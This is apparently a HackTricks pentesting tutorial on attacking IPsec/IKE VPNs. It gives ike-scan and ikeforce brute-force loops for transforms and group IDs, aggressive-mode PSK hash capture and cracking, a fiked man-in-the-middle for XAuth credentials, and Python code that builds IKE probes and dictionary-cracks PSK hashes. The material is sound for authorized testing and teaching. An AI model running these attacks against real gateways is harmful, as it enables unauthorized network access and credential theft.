500/udp - Pentesting IPsec/IKE VPN
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it for free today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
Basic Information
IPsec is widely recognized as the principal technology for securing communications between networks (LAN-to-LAN) and from remote users to the network gateway (remote access), serving as the backbone for enterprise VPN solutions.
The establishment of a security association (SA) between two points is managed by IKE, which runs inside the ISAKMP framework, a protocol designed for authentication and key exchange. The process has several phases:
- Phase 1: a secure, authenticated channel (the ISAKMP SA) is created between the two endpoints, using either a Pre-Shared Key (PSK) or certificates, in main mode (three pairs of messages, identities protected) or aggressive mode (three messages, with the identity sent in the clear and the PSK-derived hash exposed to offline cracking).
- Phase 1.5: optional, known as Extended Authentication (XAuth); it verifies the identity of the connecting user by requiring a username and password.
- Phase 2 (quick mode): negotiates the parameters (IPsec SAs) used to protect data with ESP and AH. It may use algorithms different from those of Phase 1, and an optional fresh Diffie-Hellman exchange provides Perfect Forward Secrecy (PFS).
Default port: 500/udp
Discover the service using nmap
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
Finding a valid transformation
The IPsec configuration can be prepared to accept only one or a few transformations. A transformation is a combination of values: each transform carries attributes such as DES or 3DES as the encryption algorithm, SHA1 or MD5 as the integrity (hash) algorithm, a pre-shared key as the authentication type, Diffie-Hellman group 1 or 2 as the key distribution algorithm, and 28800 seconds as the lifetime.
The first thing to do is find a transformation the server accepts, so that it will talk to you. Use ike-scan for this. By default ike-scan works in main mode and sends a packet to the gateway with an ISAKMP header and a single proposal containing eight transforms.
Depending on the response you can obtain some information about the endpoint:
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
As you can see in the response, there is a field called AUTH with the value PSK. This means the VPN is configured with a pre-shared key (which is really good for a pentester).
The last line of the output is also very important:
- 0 returned handshake; 0 returned notify: no response at all, so the target is not an IPsec gateway (or UDP/500 is filtered).
- 1 returned handshake; 0 returned notify: the target is configured for IPsec and willing to perform IKE negotiation; at least one of the proposed transforms is acceptable, and the accepted one is shown in the SA= line.
- 0 returned handshake; 1 returned notify: the gateway answers with a notify message when none of the transforms is acceptable (some gateways send nothing at all in this case, so further analysis and a revised proposal are needed).
In the example above we already have a valid transformation, but if you are in the third case you need to brute-force a little to find one.
First of all, create all the possible transformations:
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do
  for HASH in 1 2 3 4 5 6; do
    for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do
      for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do
        echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt
      done
    done
  done
done
And then brute-force each one using ike-scan (this can take several minutes):
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
If the brute-force didn't work, maybe the server is responding without handshakes even to valid transforms. Then, you could try the same brute-force but using aggressive mode:
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
Hopefully a valid transformation is echoed back.
You can try the same attack using iker.py.
You can also try to brute-force transformations with ikeforce:
./ikeforce.py <IP> # No parameters are required for scan -h for additional help
In the DH group column, 14 = 2048-bit MODP and 15 = 3072-bit MODP. In the hash column, 2 = HMAC-SHA (SHA1 in this case). The --trans format is $Enc,$Hash,$Auth,$DH.
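To make concrete what a "transformation" is on the wire, and what the numbers in --trans=$Enc,$Hash,$Auth,$DH become, here is an added example; it is not code from HackTricks or from ike-scan. It builds the ISAKMP main-mode message 1 that a probe like ike-scan sends (header plus an SA payload with one proposal and one transform per spec) and decodes the accepted transform from an SA payload back into the SA=(...) form ike-scan prints. The attribute numbers are the IANA IKEv1 ones; the initiator cookie and the 28800-second lifetime are values chosen for the example.

```python
import struct

# IKEv1 phase-1 SA attribute values, numbered as in ike-scan's --trans=$Enc,$Hash,$Auth,$DH
ENC = {1: "DES", 2: "IDEA", 3: "Blowfish", 4: "RC5", 5: "3DES", 6: "CAST", 7: "AES", 8: "Camellia"}
HASH = {1: "MD5", 2: "SHA1", 3: "Tiger", 4: "SHA2-256", 5: "SHA2-384", 6: "SHA2-512"}
AUTH = {1: "PSK", 2: "DSS", 3: "RSA_Sig", 4: "RSA_Enc", 5: "RevRSA_Enc",
        64221: "Hybrid_RSA", 65001: "XAUTH_Init_PSK", 65002: "XAUTH_Resp_PSK"}
GROUP = {1: "1:modp768", 2: "2:modp1024", 5: "5:modp1536", 14: "14:modp2048", 15: "15:modp3072"}
# ISAKMP SA attribute types (RFC 2409 appendix A)
A_ENC, A_HASH, A_AUTH, A_GROUP, A_LIFETYPE, A_LIFEDUR, A_KEYLEN = 1, 2, 3, 4, 11, 12, 14


def _attr(atype, value):
    """Basic (TV) attribute: AF bit set, 16-bit type, 16-bit value."""
    return struct.pack(">HH", 0x8000 | atype, value)


def parse_trans_spec(spec):
    """'5,2,1,2' or '7/128,2,1,14' -> (enc, keylen_or_None, hash, auth, group)."""
    enc, hsh, auth, grp = spec.split(",")
    keylen = None
    if "/" in enc:                                # ike-scan syntax for AES key length
        enc, keylen = enc.split("/")
        keylen = int(keylen)
    return int(enc), keylen, int(hsh), int(auth), int(grp)


def build_transform(number, spec, last):
    """Transform payload: generic header, transform#, ID KEY_IKE(1), 2 reserved bytes, attributes."""
    enc, keylen, hsh, auth, grp = parse_trans_spec(spec)
    attrs = _attr(A_ENC, enc) + _attr(A_HASH, hsh) + _attr(A_AUTH, auth) + _attr(A_GROUP, grp)
    if keylen is not None:                        # AES needs an explicit key length attribute
        attrs += _attr(A_KEYLEN, keylen)
    attrs += _attr(A_LIFETYPE, 1) + _attr(A_LIFEDUR, 28800)   # life type seconds, 8 hours (chosen here)
    body = struct.pack(">BBxx", number, 1) + attrs
    return struct.pack(">BxH", 0 if last else 3, 4 + len(body)) + body   # next payload 3 = Transform


def build_probe(icookie, specs):
    """Main-mode message 1: ISAKMP header + SA payload (DOI IPsec, one proposal, one transform per spec)."""
    transforms = [build_transform(i + 1, s, i == len(specs) - 1) for i, s in enumerate(specs)]
    prop_body = struct.pack(">BBBB", 1, 1, 0, len(transforms)) + b"".join(transforms)  # prop#1, PROTO_ISAKMP, SPI size 0
    proposal = struct.pack(">BxH", 0, 4 + len(prop_body)) + prop_body
    sa_body = struct.pack(">II", 1, 1) + proposal              # DOI=IPSEC(1), SIT_IDENTITY_ONLY(1)
    sa = struct.pack(">BxH", 0, 4 + len(sa_body)) + sa_body
    # header: I-cookie, R-cookie (zero in message 1), next payload SA(1), version 1.0, exchange 2 = main mode
    hdr = struct.pack(">8s8sBBBBII", icookie, bytes(8), 1, 0x10, 2, 0, 0, 28 + len(sa))
    return hdr + sa


def parse_sa(pkt):
    """Decode the first transform of an ISAKMP message whose first payload is SA (a gateway's reply)."""
    if pkt[16] != 1:
        raise ValueError("first payload is not SA (type %d)" % pkt[16])
    prop = 28 + 4 + 8                             # header + SA generic header + DOI + situation
    spi_size = pkt[prop + 6]
    trans = prop + 8 + spi_size
    t_len = struct.unpack(">H", pkt[trans + 2:trans + 4])[0]
    attrs, p, end = {}, trans + 8, trans + t_len
    while p < end:
        atype, aval = struct.unpack(">HH", pkt[p:p + 4])
        if atype & 0x8000:                        # basic attribute: value is inline
            attrs[atype & 0x7FFF] = aval
            p += 4
        else:                                     # variable-length attribute: aval is the value length
            attrs[atype] = int.from_bytes(pkt[p + 4:p + 4 + aval], "big")
            p += 4 + aval
    return attrs


def ike_scan_style(attrs):
    """Render decoded attributes the way ike-scan's SA=(...) line does."""
    parts = ["Enc=" + ENC.get(attrs.get(A_ENC), str(attrs.get(A_ENC)))]
    if A_KEYLEN in attrs:
        parts.append("KeyLength=%d" % attrs[A_KEYLEN])
    parts.append("Hash=" + HASH.get(attrs.get(A_HASH), str(attrs.get(A_HASH))))
    parts.append("Group=" + GROUP.get(attrs.get(A_GROUP), str(attrs.get(A_GROUP))))
    parts.append("Auth=" + AUTH.get(attrs.get(A_AUTH), str(attrs.get(A_AUTH))))
    if attrs.get(A_LIFETYPE) == 1:
        parts.append("LifeType=Seconds LifeDuration=%d" % attrs.get(A_LIFEDUR, 0))
    return "SA=(" + " ".join(parts) + ")"


if __name__ == "__main__":
    probe = build_probe(bytes.fromhex("0011223344556677"), ["5,2,1,2", "7/256,2,65001,14"])
    print(len(probe), "bytes;", ike_scan_style(parse_sa(probe)))
```

A gateway that accepts the proposal replies with the same SA structure containing only the transform it chose, which is what parse_sa decodes; a gateway that rejects it sends a Notify (payload type 11) instead, which is the "returned notify" case in ike-scan's summary line. Sending the probe over UDP/500 and feeding the reply to parse_sa is the whole of what the transform brute-force loop does, one spec per packet.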
Cisco recommends avoiding DH groups 1 and 2 because they are not strong enough. Well-resourced adversaries (nation states) are believed to be able to break 1024-bit and smaller MODP groups: after an expensive one-time precomputation for a given group (the attack described by the Logjam research), each individual key exchange that uses that group can be broken quickly, allowing the traffic to be read in near real time.
Server fingerprinting
Then you can use ike-scan to try to discover the vendor of the device. The tool sends an initial proposal and then stops replying, so the gateway retransmits its response; ike-scan records the time between those retransmissions. This backoff pattern is implementation-specific, so by matching it against a table of known patterns the pentester can fingerprint the VPN gateway vendor. Moreover, some VPN servers include the optional Vendor ID (VID) payload in IKE, which also identifies the implementation (the IKE Fragmentation VID above is one example).
Specify the valid transformation if needed (using --trans)
If ike-scan matches the backoff pattern to a known implementation, it prints its guess:
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
This can also be achieved with the nmap script ike-version.
Finding the correct ID (group name)
To be able to capture the hash you need a valid transformation that supports aggressive mode and the correct ID (group name). You probably won't know the valid group name, so you will have to brute-force it.
Two methods are recommended for this:
Bruteforcing ID with ike-scan
First of all, make a request with a fake ID and try to gather the hash ("-P"):
ike-scan -P -M -A -n fakeID <IP>
If no hash is returned, this brute-force method will probably work. If a hash is returned, the gateway sends back a fake hash even for a fake ID, so this method won't be reliable for brute-forcing the ID (modern versions of some gateways do this).
If no hash was returned, try to brute-force common group names with ike-scan.
This loop tries possible IDs and returns the ones for which a valid handshake comes back (those are valid group names).
If you have discovered a specific transformation, add it to the ike-scan command. If you have discovered several transformations, add another loop to try them all (try them until one of them works properly).
You can use the dictionary of ikeforce (github) or the one in seclists (github) of common group names to brute-force them:
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
Or use this dictionary (a combination of the other two without duplicates):
{% file src="../.gitbook/assets/vpnIDs.txt" %}
Bruteforcing ID with Iker
iker.py also uses ike-scan to brute-force possible group names. It follows its own method to find a valid ID based on the output of ike-scan.
Bruteforcing ID with ikeforce
ikeforce.py is a tool that can also be used to brute-force IDs. It tries to exploit different behaviours that distinguish a valid from an invalid ID (this can produce false positives and false negatives, which is why the ike-scan method is preferred when possible).
By default ikeforce first sends some random IDs to check the behaviour of the server and determine which tactic to use.
- The first method is to brute-force the group names by looking for the Dead Peer Detection (DPD) information of Cisco systems (this information is only returned by the server if the group name is correct).
- The second method is to count the number of responses to each try, because sometimes more packets are sent when the correct ID is used.
- The third method consists of looking for "INVALID-ID-INFORMATION" in the response to an incorrect ID.
- Finally, if the server does not reply anything to the checks, ikeforce will brute-force the server and check whether it replies with some packet when the correct ID is sent.
Obviously, the goal of brute-forcing the ID is to obtain the PSK hash once you have a valid ID. Then, with the ID and the PSK, you will have to brute-force the XAUTH credentials (if XAUTH is enabled).
If you have discovered an specific transformation add it in the ikeforce command. And if you have discovered several transformations feel free to add a new loop to try them all (you should try them all until one of them is working properly).
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
Sniffing ID
(From the book Network Security Assessment: Know Your Network): it is also possible to obtain valid IDs by sniffing the connection between the VPN client and the server, because the first aggressive mode packet, which contains the client ID, is sent in the clear.
Capturing & cracking the hash
Finally, if you have found a valid transformation and the group name, and aggressive mode is allowed, you can very easily grab the crackable hash:
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> # If aggressive mode is supported and you know the ID, you can get the hash of the password
The hash is saved in hash.txt.
You can use psk-crack, john (using ikescan2john.py) or hashcat to crack it:
psk-crack -d <Wordlist_path> hash.txt
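To see exactly what is being cracked here, and why only aggressive mode leaks it, the following is an added example; it is not part of HackTricks, ike-scan or psk-crack. It reproduces the RFC 2409 HASH_R computation for PSK authentication, writes a line in the nine-field colon-separated hex layout psk-crack reads (field order taken from psk-crack's documentation; check it against your own hash.txt), and runs a dictionary attack against it. All exchange values (DH public values, cookies, SA body, ID, nonces) are constructed for the example, not captured.

```python
import hashlib
import hmac

# IKEv1 prf for PSK authentication is HMAC with the negotiated hash: Hash=1 MD5, Hash=2 SHA1
PRF = {1: hashlib.md5, 2: hashlib.sha1}


def hash_r(psk, hash_id, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b):
    """RFC 2409 responder hash: SKEYID = prf(psk, Ni_b | Nr_b),
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    h = PRF[hash_id]
    skeyid = hmac.new(psk, ni_b + nr_b, h).digest()
    return hmac.new(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b, h).digest()


def make_pskcrack_line(psk, hash_id, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b):
    """Serialise an exchange as the nine colon-separated hex fields psk-crack (and hashcat 5300/5400) read:
    g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r"""
    target = hash_r(psk, hash_id, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b)
    return ":".join(x.hex() for x in (g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, target))


def sample_line(psk=b"cisco123", hash_id=2):
    """CONSTRUCTED aggressive-mode exchange, not a capture: fixed values stand in for the real ones."""
    return make_pskcrack_line(
        psk, hash_id,
        g_xr=bytes(range(128)), g_xi=bytes(reversed(range(128))),   # 1024-bit (group 2) DH public values
        cky_r=bytes.fromhex("d90bf054d6b76401"), cky_i=bytes.fromhex("0011223344556677"),
        sai_b=bytes.fromhex("0000000100000001") + bytes(24),       # DOI, situation, dummy proposal body
        idir_b=bytes([1, 0, 0, 0, 172, 16, 21, 200]),                # ID_IPV4_ADDR, no proto/port, 172.16.21.200
        ni_b=b"N" * 20, nr_b=b"R" * 20,                              # initiator / responder nonces
    )


def crack(line, wordlist):
    """Return the candidate from wordlist that reproduces hash_r, else None.
    The prf is inferred from the hash length (16 bytes MD5, 20 bytes SHA1)."""
    fields = [bytes.fromhex(x) for x in line.strip().split(":")]
    if len(fields) != 9:
        raise ValueError("expected 9 fields, got %d" % len(fields))
    g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, target = fields
    hash_id = {16: 1, 20: 2}[len(target)]
    for cand in wordlist:
        guess = hash_r(cand.encode(), hash_id, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b)
        if hmac.compare_digest(guess, target):
            return cand
    return None


if __name__ == "__main__":
    line = sample_line()
    print(line[:60] + "...")
    print("PSK:", crack(line, ["password", "admin", "cisco123", "letmein"]))
```

Everything HASH_R covers is public except the PSK, which is why aggressive mode is fatal: the responder sends HASH_R in the clear in its second message, before the initiator has proven knowledge of the key, so ike-scan can collect it with a bogus peer. In main mode the same hash travels encrypted under keys derived from SKEYID, and --pskcrack gets nothing. For real cracking use psk-crack, john or hashcat (-m 5300 for MD5, -m 5400 for SHA1); this script exists to show the computation, not to compete on speed.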
XAuth
Aggressive mode IKE combined with a Pre-Shared Key (PSK) is commonly used for group authentication. It is augmented by XAuth (Extended Authentication), which adds a layer of user authentication, typically backed by Microsoft Active Directory, RADIUS or a comparable system.
In IKEv2, EAP (Extensible Authentication Protocol) is used instead of XAuth to authenticate users.
Local network MitM to capture credentials
So you can capture the login data using fiked and check whether there is any default username (you need to redirect the IKE traffic to fiked for sniffing, which can be done with ARP spoofing; see more info). Given the group name and PSK (-k), fiked acts as a fake VPN endpoint, completes Phase 1 and captures the XAuth credentials:
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
Brute-forcing XAUTH username and password with ikeforce
To brute-force the XAUTH credentials (when you know a valid group name ID and the PSK) you can use a username or a list of usernames and a list of passwords:
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
This way, ikeforce will try to connect using each username:password combination.
Authentication with an IPSEC VPN
In Kali, VPNC is used to establish IPsec tunnels. The profiles have to be located in the directory /etc/vpnc/ and are started with the vpnc command.
Commands and configuration to set up a VPN connection with VPNC:
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
In this setup:
- Replace [VPN_GATEWAY_IP] with the actual IP address of the VPN gateway.
- Replace [VPN_CONNECTION_ID] with the identifier (group name) for the VPN connection.
- Replace [VPN_GROUP_SECRET] with the VPN's group secret (the PSK).
- Replace [VPN_USERNAME] and [VPN_PASSWORD] with the VPN authentication credentials.
- [PID] is the process ID assigned when vpnc starts.
Ensure that actual, secure values are used to replace the placeholders when configuring the VPN.
Reference Material
- PSK cracking paper
- SecurityFocus Infocus
- Scanning a VPN Implementation
- Network Security Assessment 3rd Edition
Shodan
port:500 IKE